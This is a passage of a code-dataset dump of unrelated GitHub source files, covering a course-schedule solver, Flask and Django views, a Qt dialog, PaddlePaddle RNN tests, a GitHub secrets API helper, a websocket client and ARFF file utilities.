return res == numCourses\n    \n\n    \"\"\"\n    Return an order in which to take the courses so that all of them can be finished. There may be several valid orders; returning any one of them is fine. If it is impossible to finish all the courses, return an empty array.\n    \"\"\"\n    def findOrder(self, numCourses, prerequisites):\n        indegree = [0 for _ in range(numCourses)]\n        edge = {i:[] for i in range(numCourses)}\n        res = []\n\n        for cur, pre in prerequisites:\n            indegree[cur] += 1\n            edge[pre].append(cur)\n\n        queue = collections.deque(i for i in range(numCourses) if indegree[i] == 0)\n\n        while queue:\n            course = queue.pop()\n            res.append(course)\n            for i in edge[course]:\n                indegree[i] -= 1\n                if indegree[i] == 0:\n                    queue.append(i)\n\n        return res\n    \n\nif __name__ == '__main__':\n    # ======= Test Case =======\n    numCourses = 4\n    prerequisites = [[1,0],[2,0],[3,1],[3,2]]\n    # ====== Driver Code ======\n    Sol = Solution()\n    res = Sol.findOrder(numCourses, prerequisites)\n    
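# any valid topological order is acceptable here, e.g. [0, 1, 2, 3] or [0, 2, 1, 3] for this test case\n    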
print(res)","repo_name":"bizbard/leetcode-hot100-python","sub_path":"课程表.py","file_name":"课程表.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32050259060","text":"from flask import redirect, render_template\nfrom app import application\nfrom app.models import User\nfrom app.forms.user import UserCreateForm\n\n\n@application.route('/users', methods=['GET'])\ndef index():\n users = User.query.all()\n return render_template('users/index.html', workspaces=users)\n\n\n@application.route('/users/new', methods=['GET', 'POST'])\ndef create():\n form = UserCreateForm()\n if form.validate_on_submit():\n User.create(\n name=form.name.data,\n email=form.email.data,\n )\n\n return redirect('/users')\n return render_template('users/create.html', form=form)\n","repo_name":"iwabuchi02/ci_cd_flask","sub_path":"app/views/users_view.py","file_name":"users_view.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20341681845","text":"# © MNELAB developers\n#\n# License: BSD (3-clause)\n\nfrom mne.io.pick import channel_type, get_channel_type_constants\nfrom PySide6.QtCore import QSortFilterProxyModel, Qt, Slot\nfrom PySide6.QtGui import QStandardItem, QStandardItemModel\nfrom PySide6.QtWidgets import (\n QAbstractItemView,\n QComboBox,\n QDialog,\n QDialogButtonBox,\n QStyledItemDelegate,\n QTableView,\n QVBoxLayout,\n)\n\nchannel_types = [k.upper() for k in get_channel_type_constants().keys()]\n\n\nclass ChannelPropertiesDialog(QDialog):\n def __init__(self, parent, info, title=\"Channel Properties\"):\n super().__init__(parent)\n self.setWindowTitle(title)\n\n self.model = QStandardItemModel(info[\"nchan\"], 4)\n self.model.setHorizontalHeaderLabels([\"#\", \"Label\", \"Type\", \"Bad\"])\n for index, ch in enumerate(info[\"chs\"]):\n item = QStandardItem()\n item.setData(index, Qt.DisplayRole)\n item.setFlags(item.flags() & ~Qt.ItemIsEditable)\n self.model.setItem(index, 0, item)\n self.model.setItem(index, 1, QStandardItem(ch[\"ch_name\"]))\n kind = channel_type(info, index).upper()\n self.model.setItem(index, 2, QStandardItem(str(kind)))\n bad = QStandardItem()\n bad.setData(ch[\"ch_name\"] in info[\"bads\"], Qt.UserRole)\n bad.setCheckable(True)\n bad.setEditable(False)\n checked = ch[\"ch_name\"] in info[\"bads\"]\n bad.setCheckState(Qt.Checked if checked else Qt.Unchecked)\n self.model.setItem(index, 3, bad)\n\n self.model.itemChanged.connect(bad_changed)\n self.proxymodel = MySortFilterProxyModel()\n self.proxymodel.setDynamicSortFilter(False)\n self.proxymodel.setSourceModel(self.model)\n\n self.view = QTableView()\n self.view.setModel(self.proxymodel)\n self.view.setItemDelegateForColumn(2, ComboBoxDelegate(self.view))\n self.view.setEditTriggers(QAbstractItemView.AllEditTriggers)\n self.view.verticalHeader().setVisible(False)\n self.view.horizontalHeader().setStretchLastSection(True)\n self.view.setShowGrid(False)\n self.view.setSelectionMode(QAbstractItemView.NoSelection)\n self.view.setSortingEnabled(True)\n self.view.sortByColumn(0, Qt.AscendingOrder)\n\n vbox = QVBoxLayout(self)\n vbox.addWidget(self.view)\n self.buttonbox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n vbox.addWidget(self.buttonbox)\n self.buttonbox.accepted.connect(self.accept)\n self.buttonbox.rejected.connect(self.reject)\n\n self.resize(475, 650)\n self.view.setColumnWidth(0, 70)\n 
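# fixed widths for the narrower columns; the last section is set to stretch above\n        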
self.view.setColumnWidth(1, 155)\n self.view.setColumnWidth(2, 90)\n\n\nclass MySortFilterProxyModel(QSortFilterProxyModel):\n \"\"\"Add ability to filter on Qt.UserRole if Qt.DisplayRole is None.\n\n This is useful for the 'Bad' column, which stores its data (True/False) as Qt.UserRole\n instead of the default Qt.DisplayRole.\n \"\"\"\n\n def lessThan(self, left, right):\n left_data = self.sourceModel().data(left)\n right_data = self.sourceModel().data(right)\n if left_data is None:\n left_data = self.sourceModel().data(left, Qt.UserRole)\n if right_data is None:\n right_data = self.sourceModel().data(right, Qt.UserRole)\n\n return left_data < right_data\n\n\nclass ComboBoxDelegate(QStyledItemDelegate):\n @Slot()\n def commit_data(self):\n self.commitData.emit(self.sender())\n self.closeEditor.emit(self.sender())\n\n def createEditor(self, parent, option, index):\n editor = QComboBox(parent)\n editor.addItems(channel_types)\n editor.currentIndexChanged.connect(self.commit_data)\n return editor\n\n def setEditorData(self, editor, index):\n value = index.model().data(index, Qt.EditRole)\n editor.setCurrentIndex(editor.findText(value))\n editor.showPopup()\n\n def setModelData(self, editor, model, index):\n value = editor.currentText()\n model.setData(index, value, Qt.EditRole)\n\n def updateEditorGeometry(self, editor, option, index):\n editor.setGeometry(option.rect)\n\n\n@Slot()\ndef bad_changed(item):\n if item.checkState() == Qt.Checked:\n item.setData(True, Qt.UserRole)\n else:\n item.setData(False, Qt.UserRole)\n","repo_name":"cbrnr/mnelab","sub_path":"mnelab/dialogs/channel_properties.py","file_name":"channel_properties.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"52"} +{"seq_id":"453045711","text":"from __future__ import print_function\n\nimport unittest\nimport numpy\n\nimport paddle.fluid as fluid\nimport paddle.fluid.layers as layers\nimport paddle.fluid.core as core\n\nfrom paddle.fluid.executor import Executor\nfrom paddle.fluid import framework\n\nfrom paddle.fluid.layers.rnn import LSTMCell, GRUCell, RNNCell\nfrom paddle.fluid.layers import rnn as dynamic_rnn\nfrom paddle.fluid import contrib\nfrom paddle.fluid.contrib.layers import basic_lstm\nimport paddle.fluid.layers.utils as utils\n\nimport numpy as np\n\n\nclass TestLSTMCell(unittest.TestCase):\n def setUp(self):\n self.batch_size = 4\n self.input_size = 16\n self.hidden_size = 16\n\n def test_run(self):\n inputs = fluid.data(\n name='inputs', shape=[None, self.input_size], dtype='float32')\n pre_hidden = fluid.data(\n name='pre_hidden', shape=[None, self.hidden_size], dtype='float32')\n pre_cell = fluid.data(\n name='pre_cell', shape=[None, self.hidden_size], dtype='float32')\n\n cell = LSTMCell(self.hidden_size)\n lstm_hidden_new, lstm_states_new = cell(inputs, [pre_hidden, pre_cell])\n\n lstm_unit = contrib.layers.rnn_impl.BasicLSTMUnit(\n \"basicLSTM\", self.hidden_size, None, None, None, None, 1.0,\n \"float32\")\n lstm_hidden, lstm_cell = lstm_unit(inputs, pre_hidden, pre_cell)\n\n if core.is_compiled_with_cuda():\n place = core.CUDAPlace(0)\n else:\n place = core.CPUPlace()\n exe = Executor(place)\n exe.run(framework.default_startup_program())\n\n inputs_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.input_size)).astype('float32')\n pre_hidden_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.hidden_size)).astype('float32')\n pre_cell_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, 
self.hidden_size)).astype('float32')\n\n param_names = [[\n \"LSTMCell/BasicLSTMUnit_0.w_0\", \"basicLSTM/BasicLSTMUnit_0.w_0\"\n ], [\"LSTMCell/BasicLSTMUnit_0.b_0\", \"basicLSTM/BasicLSTMUnit_0.b_0\"]]\n\n for names in param_names:\n param = np.array(fluid.global_scope().find_var(names[0]).get_tensor(\n ))\n param = np.random.uniform(\n -0.1, 0.1, size=param.shape).astype('float32')\n fluid.global_scope().find_var(names[0]).get_tensor().set(param,\n place)\n fluid.global_scope().find_var(names[1]).get_tensor().set(param,\n place)\n\n out = exe.run(feed={\n 'inputs': inputs_np,\n 'pre_hidden': pre_hidden_np,\n 'pre_cell': pre_cell_np\n },\n fetch_list=[lstm_hidden_new, lstm_hidden])\n\n self.assertTrue(np.allclose(out[0], out[1], rtol=1e-4, atol=0))\n\n\nclass TestGRUCell(unittest.TestCase):\n def setUp(self):\n self.batch_size = 4\n self.input_size = 16\n self.hidden_size = 16\n\n def test_run(self):\n inputs = fluid.data(\n name='inputs', shape=[None, self.input_size], dtype='float32')\n pre_hidden = layers.data(\n name='pre_hidden',\n shape=[None, self.hidden_size],\n append_batch_size=False,\n dtype='float32')\n\n cell = GRUCell(self.hidden_size)\n gru_hidden_new, _ = cell(inputs, pre_hidden)\n\n gru_unit = contrib.layers.rnn_impl.BasicGRUUnit(\n \"basicGRU\", self.hidden_size, None, None, None, None, \"float32\")\n gru_hidden = gru_unit(inputs, pre_hidden)\n\n if core.is_compiled_with_cuda():\n place = core.CUDAPlace(0)\n else:\n place = core.CPUPlace()\n exe = Executor(place)\n exe.run(framework.default_startup_program())\n\n inputs_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.input_size)).astype('float32')\n pre_hidden_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.hidden_size)).astype('float32')\n\n param_names = [\n [\"GRUCell/BasicGRUUnit_0.w_0\", \"basicGRU/BasicGRUUnit_0.w_0\"],\n [\"GRUCell/BasicGRUUnit_0.w_1\", \"basicGRU/BasicGRUUnit_0.w_1\"],\n [\"GRUCell/BasicGRUUnit_0.b_0\", \"basicGRU/BasicGRUUnit_0.b_0\"],\n [\"GRUCell/BasicGRUUnit_0.b_1\", \"basicGRU/BasicGRUUnit_0.b_1\"]\n ]\n\n for names in param_names:\n param = np.array(fluid.global_scope().find_var(names[0]).get_tensor(\n ))\n param = np.random.uniform(\n -0.1, 0.1, size=param.shape).astype('float32')\n fluid.global_scope().find_var(names[0]).get_tensor().set(param,\n place)\n fluid.global_scope().find_var(names[1]).get_tensor().set(param,\n place)\n\n out = exe.run(feed={'inputs': inputs_np,\n 'pre_hidden': pre_hidden_np},\n fetch_list=[gru_hidden_new, gru_hidden])\n\n self.assertTrue(np.allclose(out[0], out[1], rtol=1e-4, atol=0))\n\n\nclass TestRnn(unittest.TestCase):\n def setUp(self):\n self.batch_size = 4\n self.input_size = 16\n self.hidden_size = 16\n self.seq_len = 4\n\n def test_run(self):\n inputs_basic_lstm = fluid.data(\n name='inputs_basic_lstm',\n shape=[None, None, self.input_size],\n dtype='float32')\n sequence_length = fluid.data(\n name=\"sequence_length\", shape=[None], dtype='int64')\n\n inputs_dynamic_rnn = layers.transpose(inputs_basic_lstm, perm=[1, 0, 2])\n cell = LSTMCell(self.hidden_size, name=\"LSTMCell_for_rnn\")\n output, final_state = dynamic_rnn(\n cell=cell,\n inputs=inputs_dynamic_rnn,\n sequence_length=sequence_length,\n is_reverse=False)\n output_new = layers.transpose(output, perm=[1, 0, 2])\n\n rnn_out, last_hidden, last_cell = basic_lstm(inputs_basic_lstm, None, None, self.hidden_size, num_layers=1, \\\n batch_first = False, bidirectional=False, sequence_length=sequence_length, forget_bias = 1.0)\n\n if core.is_compiled_with_cuda():\n place = 
core.CUDAPlace(0)\n else:\n place = core.CPUPlace()\n exe = Executor(place)\n exe.run(framework.default_startup_program())\n\n inputs_basic_lstm_np = np.random.uniform(\n -0.1, 0.1,\n (self.seq_len, self.batch_size, self.input_size)).astype('float32')\n sequence_length_np = np.ones(\n self.batch_size, dtype='int64') * self.seq_len\n\n inputs_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.input_size)).astype('float32')\n pre_hidden_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.hidden_size)).astype('float32')\n pre_cell_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.hidden_size)).astype('float32')\n\n param_names = [[\n \"LSTMCell_for_rnn/BasicLSTMUnit_0.w_0\",\n \"basic_lstm_layers_0/BasicLSTMUnit_0.w_0\"\n ], [\n \"LSTMCell_for_rnn/BasicLSTMUnit_0.b_0\",\n \"basic_lstm_layers_0/BasicLSTMUnit_0.b_0\"\n ]]\n\n for names in param_names:\n param = np.array(fluid.global_scope().find_var(names[0]).get_tensor(\n ))\n param = np.random.uniform(\n -0.1, 0.1, size=param.shape).astype('float32')\n fluid.global_scope().find_var(names[0]).get_tensor().set(param,\n place)\n fluid.global_scope().find_var(names[1]).get_tensor().set(param,\n place)\n\n out = exe.run(feed={\n 'inputs_basic_lstm': inputs_basic_lstm_np,\n 'sequence_length': sequence_length_np,\n 'inputs': inputs_np,\n 'pre_hidden': pre_hidden_np,\n 'pre_cell': pre_cell_np\n },\n fetch_list=[output_new, rnn_out])\n\n self.assertTrue(np.allclose(out[0], out[1], rtol=1e-4))\n\n\nclass TestRnnUtil(unittest.TestCase):\n \"\"\"\n Test cases for rnn apis' utility methods for coverage.\n \"\"\"\n\n def test_case(self):\n inputs = {\"key1\": 1, \"key2\": 2}\n func = lambda x: x + 1\n outputs = utils.map_structure(func, inputs)\n utils.assert_same_structure(inputs, outputs)\n try:\n inputs[\"key3\"] = 3\n utils.assert_same_structure(inputs, outputs)\n except ValueError as identifier:\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pyqt1/MyPaddle","sub_path":"python/paddle/fluid/tests/unittests/test_rnn_cell_api.py","file_name":"test_rnn_cell_api.py","file_ext":"py","file_size_in_byte":8829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7672701742","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom . 
import views\n\nurlpatterns = [\n    url(r'^list/$', views.blog_list, name='list'),\n    url(r'^create/$', views.blog_create),\n    url(r'^detail/(\d+)/$', views.blog_detail, name='detail'),\n    url(r'^(\d+)/edit/$', views.blog_update, name='update'),\n    url(r'^(\d+)/delete/$', views.blog_delete),\n    url(r'^FavouriteBlog/(\w+)/$', views.favourite_blog_user),\n    url(r'^DelFavouriteBlog/(\w+)/$', views.delete_favourite_blog_user),\n]\n\n\n\n","repo_name":"asadeque/python-django-project","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"697755101","text":"import base64\nimport os\nimport nacl.encoding\nimport nacl.public\nimport requests\n\nfrom ..Auth import GhAppPrivateKey\nfrom ..DefaultHosts import DefaultApiHost, HostGetter\nfrom ..Utils import CheckResp, LogEnvVars\nfrom .ApiRunner import ApiRunner\nfrom ._Types import (\n\t_AuthType,\n\t_ArgsType,\n\t_ArgParserType,\n\t_RespType,\n)\n\n\nclass GetRepoPubKey(ApiRunner):\n\t# https://docs.github.com/en/rest/actions/secrets#get-a-repository-public-key\n\n\tURL_BASE = 'https://{api_host}/repos/{owner}/{repo}/actions/secrets/public-key'\n\n\tdef __init__(\n\t\tself,\n\t\towner: str,\n\t\trepoName: str,\n\t\thostGetter: HostGetter = DefaultApiHost(),\n\t) -> None:\n\t\tsuper(GetRepoPubKey, self).__init__()\n\n\t\tself._url = self.URL_BASE.format(\n\t\t\tapi_host=hostGetter.GetHost(),\n\t\t\towner=owner,\n\t\t\trepo=repoName,\n\t\t)\n\n\tdef MakeRequest(self, auth: _AuthType) -> _RespType:\n\t\tauthHeaderKey, authHeaderVal = auth.GetHeader()\n\n\t\treq = requests.get(\n\t\t\turl=self._url,\n\t\t\theaders={\n\t\t\t\t'Accept': 'application/vnd.github+json',\n\t\t\t\tauthHeaderKey: authHeaderVal,\n\t\t\t},\n\t\t)\n\t\tCheckResp.CheckRespErr(req)\n\n\t\treturn req\n\n\nclass SetRepoSecret(ApiRunner):\n\t# https://docs.github.com/en/rest/actions/secrets#create-or-update-a-repository-secret\n\n\tURL_BASE = 'https://{api_host}/repos/{owner}/{repo}/actions/secrets/{secret_name}'\n\n\tdef __init__(\n\t\tself,\n\t\towner: str,\n\t\trepoName: str,\n\t\trepoPubKey: str,\n\t\trepoPubKeyID: str,\n\t\tsecretName: str,\n\t\tsecretValue: str,\n\t\thostGetter: HostGetter = DefaultApiHost(),\n\t) -> None:\n\t\tsuper(SetRepoSecret, self).__init__()\n\n\t\tself._url = self.URL_BASE.format(\n\t\t\tapi_host=hostGetter.GetHost(),\n\t\t\towner=owner,\n\t\t\trepo=repoName,\n\t\t\tsecret_name=secretName,\n\t\t)\n\n\t\tself._repoPubKey = repoPubKey\n\t\tself._repoPubKeyID = repoPubKeyID\n\t\tself._secretValue = secretValue\n\n\tdef _EncryptSecret(self) -> str:\n\t\tpubKey = nacl.public.PublicKey(\n\t\t\tself._repoPubKey.encode(\"utf-8\"),\n\t\t\tnacl.encoding.Base64Encoder()\n\t\t)\n\t\tsealedBox = nacl.public.SealedBox(pubKey)\n\t\tencrypted = sealedBox.encrypt(self._secretValue.encode(\"utf-8\"))\n\t\treturn base64.b64encode(encrypted).decode(\"utf-8\")\n\n\tdef _GenPayload(self) -> dict:\n\t\treturn {\n\t\t\t'encrypted_value': self._EncryptSecret(),\n\t\t\t'key_id': self._repoPubKeyID,\n\t\t}\n\n\tdef MakeRequest(self, auth: _AuthType) -> _RespType:\n\t\tauthHeaderKey, authHeaderVal = auth.GetHeader()\n\n\t\treq = requests.put(\n\t\t\turl=self._url,\n\t\t\theaders={\n\t\t\t\t'Accept': 'application/vnd.github+json',\n\t\t\t\tauthHeaderKey: authHeaderVal,\n\t\t\t},\n\t\t\tjson=self._GenPayload(),\n\t\t)\n\t\tCheckResp.CheckRespErr(req)\n\n\t\treturn req\n\n\nclass SetRepoSecretFromGhApp(ApiRunner):\n\n\tdef 
__init__(\n\t\tself,\n\t\towner: str,\n\t\trepoName: str,\n\t\tsecretName: str,\n\t\thostGetter: HostGetter = DefaultApiHost(),\n\t) -> None:\n\t\tsuper(SetRepoSecretFromGhApp, self).__init__()\n\n\t\tself._owner = owner\n\t\tself._repoName = repoName\n\t\tself._secretName = secretName\n\t\tself._hostGetter = hostGetter\n\n\tdef CliRun(self, auth: _AuthType) -> None:\n\n\t\tpubKeyGetter = GetRepoPubKey(\n\t\t\towner=self._owner,\n\t\t\trepoName=self._repoName,\n\t\t\thostGetter=self._hostGetter,\n\t\t)\n\t\tpubKeyRespJson = pubKeyGetter.MakeRequest(auth).json()\n\t\tpubKey = pubKeyRespJson['key']\n\t\tpubKeyID = pubKeyRespJson['key_id']\n\n\t\tappKeyGetter = GhAppPrivateKey.FromEnvVars()\n\t\ttoken = appKeyGetter.GetToken()\n\n\t\tsecretSetter = SetRepoSecret(\n\t\t\towner=self._owner,\n\t\t\trepoName=self._repoName,\n\t\t\trepoPubKey=pubKey,\n\t\t\trepoPubKeyID=pubKeyID,\n\t\t\tsecretName=self._secretName,\n\t\t\tsecretValue=token,\n\t\t\thostGetter=self._hostGetter,\n\t\t)\n\t\tsecretSetter.MakeRequest(auth)\n\n\t@staticmethod\n\tdef _AddOpArgParsers(opArgParser: _ArgParserType) -> None:\n\t\topArgParser.add_argument(\n\t\t\t'--secret', type=str, required=True,\n\t\t\thelp='The name of the secret to create or update.',\n\t\t)\n\n\t@classmethod\n\tdef FromArgs(cls, args: _ArgsType) -> ApiRunner:\n\t\tLogEnvVars.LogEnvVars()\n\t\trepo = os.environ['GITHUB_REPOSITORY']\n\t\towner, repoName = repo.split('/', maxsplit=1)\n\t\treturn cls(\n\t\t\towner=owner,\n\t\t\trepoName=repoName,\n\t\t\tsecretName=args.secret,\n\t\t)\n","repo_name":"zhenghaven/GitHubApiHelper","sub_path":"GitHubApiHelper/APIs/ApiActionsSecrets.py","file_name":"ApiActionsSecrets.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12743956902","text":"def eval(net,n_points,device='cpu'):\n\n net.eval().to(device)\n dataloader=Transliteration_DataLoader(transliteration_file)\n trans_batch=dataloader.get_batch(n_points)\n eng_words , hin_words= [i[0] for i in trans_batch] , [i[1] for i in trans_batch]\n eng_len , hin_len=[len(i) for i in eng_words],[len(i) for i in hin_words]\n\n\n eng_rep=word_rep(eng_words,max(eng_len),eng_alphabets).to(device)\n hin_rep=word_rep(hin_words,max(hin_len),hin_alphabets)\n\n batch_truth=[]\n for i in hin_words:\n word_truth=[hin_alphabets.index(char) for char in i]\n for j in range((max(hin_len)+1)-len(word_truth)):\n word_truth.append(hin_alphabets.index(''))\n batch_truth.append(word_truth)\n batch_truth=torch.tensor(batch_truth).to(device)\n correct=0\n total_letters=0\n for i in range(len(eng_rep)):\n # print(eng_words[i],hin_words[i])\n batched_output=net.forward(eng_rep[i].unsqueeze(0),batch_size=1,ground_truth=hin_rep[i].unsqueeze(0),max_len=hin_len[i]+1,device=device)\n output=batched_output.view(batched_output.size()[1],-1).permute(1,0)\n\n\n for index,letter in enumerate(output):\n total_letters+=1\n # print(\"Predicted\",hin_alphabets[torch.argmax(letter)])\n # print(\"Truth\",hin_alphabets[batch_truth[i][index]])\n if torch.argmax(letter)==batch_truth[i][index]:\n correct+=1\n return correct/total_letters\n\n\ndef predict(net,word,device='cpu'):\n\n net.eval().to(device)\n eng_rep=word_rep([word],len(word),eng_alphabets).to(device)\n batched_output=net.forward(eng_rep[0].unsqueeze(0),batch_size=1,ground_truth=None,max_len=10,device=device)\n output=batched_output.view(batched_output.size()[1],-1).permute(1,0)\n hin_word=\"\"\n \n for i in range(len(eng_rep)):\n 
batched_output=net.forward(eng_rep[i].unsqueeze(0),batch_size=1,ground_truth=None,max_len=10,device=device)\n output=batched_output.view(batched_output.size()[1],-1).permute(1,0)\n\n for index,letter in enumerate(output):\n if hin_alphabets[torch.argmax(letter)]=='':\n break\n hin_word+=hin_alphabets[torch.argmax(letter)]\n\n return hin_word\n","repo_name":"TanD18/Transliteration-enc-dec-attention-model-","sub_path":"code/evaluate-predict.py","file_name":"evaluate-predict.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30826015940","text":"import websocket\nimport json\n\ndef on_message(ws, message):\n print(f\"Received message: {message}\")\n\ndef on_error(ws, error):\n print(f\"Error: {error}\")\n\ndef on_close(ws, close_status_code, close_msg):\n print(f\"Closed with status code {close_status_code}: {close_msg}\")\n\ndef on_open(ws):\n # Define a message to be sent to the server\n message_data = {\n \"type\": \"websocket.receive\",\n \"text\": \"Hello from Python WebSocket Client\"\n }\n\n # Send the message as JSON\n ws.send(json.dumps(message_data))\n\nif __name__ == \"__main__\":\n # Replace the URL with your WebSocket server URL\n websocket_url = \"ws://127.0.0.1:8000/ws\"\n\n # Create a WebSocket instance\n ws = websocket.WebSocketApp(websocket_url,\n on_message=on_message,\n on_error=on_error,\n on_close=on_close)\n\n # Set the on_open callback to send a message when the connection is established\n ws.on_open = on_open\n \n # Run the WebSocket connection\n ws.run_forever()\n","repo_name":"Minervaa45/lab","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33997197670","text":"\"\"\"Util function for writing to and reading arff files.\"\"\"\n\n__author__ = [\"SebasKoel\", \"Emiliathewolf\", \"TonyBagnall\", \"jasonlines\", \"achieveordie\"]\n__all__ = [\"load_from_arff_to_dataframe\"]\n\nimport itertools\nimport os\nimport textwrap\n\nimport numpy as np\nimport pandas as pd\n\nfrom sktime.transformations.base import BaseTransformer\n\n# ==================================================================================================\n# Utils function to read arff file\n# ==================================================================================================\n\n\n# TODO: original author didnt add test for this function\n# Refactor the nested loops\ndef load_from_arff_to_dataframe(\n full_file_path_and_name,\n has_class_labels=True,\n return_separate_X_and_y=True,\n replace_missing_vals_with=\"NaN\",\n):\n \"\"\"Load data from a .arff file into a Pandas DataFrame.\n\n Parameters\n ----------\n full_file_path_and_name: str\n The full pathname of the .arff file to read.\n has_class_labels: bool\n true then line contains separated strings and class value contains\n list of separated strings, check for 'return_separate_X_and_y'\n false otherwise.\n return_separate_X_and_y: bool\n true then X and Y values should be returned as separate Data Frames (\n X) and a numpy array (y), false otherwise.\n This is only relevant for data.\n replace_missing_vals_with: str\n The value that missing values in the text file should be replaced\n with prior to parsing.\n\n Returns\n -------\n DataFrame, ndarray\n If return_separate_X_and_y then a tuple containing a DataFrame and a\n numpy array containing the relevant time-series and corresponding\n 
class values.\n DataFrame\n If not return_separate_X_and_y then a single DataFrame containing\n all time-series and (if relevant) a column \"class_vals\" the\n associated class values.\n \"\"\"\n instance_list = []\n class_val_list = []\n data_started = False\n is_multi_variate = False\n is_first_case = True\n # Parse the file\n # print(full_file_path_and_name)\n with open(full_file_path_and_name, encoding=\"utf-8\") as f:\n for line in f:\n if line.strip():\n if (\n is_multi_variate is False\n and \"@attribute\" in line.lower()\n and \"relational\" in line.lower()\n ):\n is_multi_variate = True\n\n if \"@data\" in line.lower():\n data_started = True\n continue\n # if the 'data tag has been found, the header information\n # has been cleared and now data can be loaded\n if data_started:\n line = line.replace(\"?\", replace_missing_vals_with)\n\n if is_multi_variate:\n if has_class_labels:\n line, class_val = line.split(\"',\")\n class_val_list.append(class_val.strip())\n dimensions = line.split(\"\\\\n\")\n dimensions[0] = dimensions[0].replace(\"'\", \"\")\n\n if is_first_case:\n for _d in range(len(dimensions)):\n instance_list.append([])\n is_first_case = False\n\n for dim in range(len(dimensions)):\n instance_list[dim].append(\n pd.Series(\n [float(i) for i in dimensions[dim].split(\",\")]\n )\n )\n\n else:\n if is_first_case:\n instance_list.append([])\n is_first_case = False\n\n line_parts = line.split(\",\")\n if has_class_labels:\n instance_list[0].append(\n pd.Series(\n [\n float(i)\n for i in line_parts[: len(line_parts) - 1]\n ]\n )\n )\n class_val_list.append(line_parts[-1].strip())\n else:\n instance_list[0].append(\n pd.Series(\n [float(i) for i in line_parts[: len(line_parts)]]\n )\n )\n x_data = pd.DataFrame(dtype=np.float32)\n for dim in range(len(instance_list)):\n x_data[\"dim_\" + str(dim)] = instance_list[dim]\n if has_class_labels:\n if return_separate_X_and_y:\n return x_data, np.asarray(class_val_list)\n else:\n x_data[\"class_vals\"] = pd.Series(class_val_list)\n return x_data\n\n\n# ==================================================================================================\n# Utils function to write results from tabular transformation to arff file\n# ==================================================================================================\n\n\n# Research function?\ndef write_tabular_transformation_to_arff(\n data,\n transformation,\n path,\n problem_name=\"sample_data\",\n class_label=None,\n class_value_list=None,\n comment=None,\n fold=\"\",\n fit_transform=True,\n):\n \"\"\"Transform dataset using a tabular transformer and write the result to arff file.\n\n Parameters\n ----------\n data: pandas dataframe or 3d numpy array\n The dataset to build the transformation with which must be of the structure\n specified in the documentation examples/loading_data.ipynb.\n transformation: BaseTransformer\n Transformation use and to save to arff.\n path: str\n The full path to output the arff file to.\n problem_name: str, default=\"sample_data\"\n The problemName to print in the header of the arff file and also the name of\n the file.\n class_label: list of str or None, default=None\n The problems class labels to show the possible class values for in the file\n header, optional.\n class_value_list: list, ndarray or None, default=None\n The class values for each case, optional.\n comment: str or None, default=None\n Comment text to be inserted before the header in a block.\n fold: str or None, default=None\n Addon at the end of the filename, i.e. 
_TRAIN or _TEST.\n fit_transform: bool, default=True\n Whether to fit the transformer prior to calling transform.\n\n Returns\n -------\n None\n \"\"\"\n # ensure transformation provided is a transformer\n if not isinstance(transformation, BaseTransformer):\n raise ValueError(\"Transformation must be a BaseTransformer\")\n if fit_transform:\n data = transformation.fit_transform(data, class_value_list)\n else:\n data = transformation.transform(data, class_value_list)\n if isinstance(data, pd.DataFrame):\n data = data.to_numpy()\n if class_value_list is not None and class_label is None:\n class_label = np.unique(class_value_list)\n elif class_value_list is None:\n class_value_list = []\n # ensure number of cases is same as the class value list\n if len(data) != len(class_value_list) and len(class_value_list) > 0:\n raise IndexError(\n \"The number of cases is not the same as the number of given class values\"\n )\n if fold is None:\n fold = \"\"\n # create path if not exist\n dirt = f\"{str(path)}/{str(problem_name)}-{type(transformation).__name__}/\"\n try:\n os.makedirs(dirt)\n except os.error:\n pass # raises os.error if path already exists\n # create arff file in the path\n file = open(\n f\"{dirt}{str(problem_name)}-{type(transformation).__name__}{fold}.arff\", \"w\"\n )\n # write comment if any as a block at start of file\n if comment is not None:\n file.write(\"\\n% \".join(textwrap.wrap(\"% \" + comment)))\n file.write(\"\\n\")\n # begin writing header information\n file.write(f\"@Relation {problem_name}\\n\")\n # write each attribute\n for i in range(data.shape[1]):\n file.write(f\"@attribute att{str(i)} numeric\\n\")\n # write class attribute if it exists\n if class_label is not None:\n comma_separated_class_label = \",\".join(str(label) for label in class_label)\n file.write(f\"@attribute target {{{comma_separated_class_label}}}\\n\")\n file.write(\"@data\\n\")\n for case, value in itertools.zip_longest(data, class_value_list):\n # turn attributes into comma-separated row\n atts = \",\".join([str(num) if not np.isnan(num) else \"?\" for num in case])\n file.write(str(atts))\n if value is not None:\n file.write(f\",{value}\") # write the case value if any\n elif class_label is not None:\n file.write(\",?\")\n file.write(\"\\n\") # open a new line\n 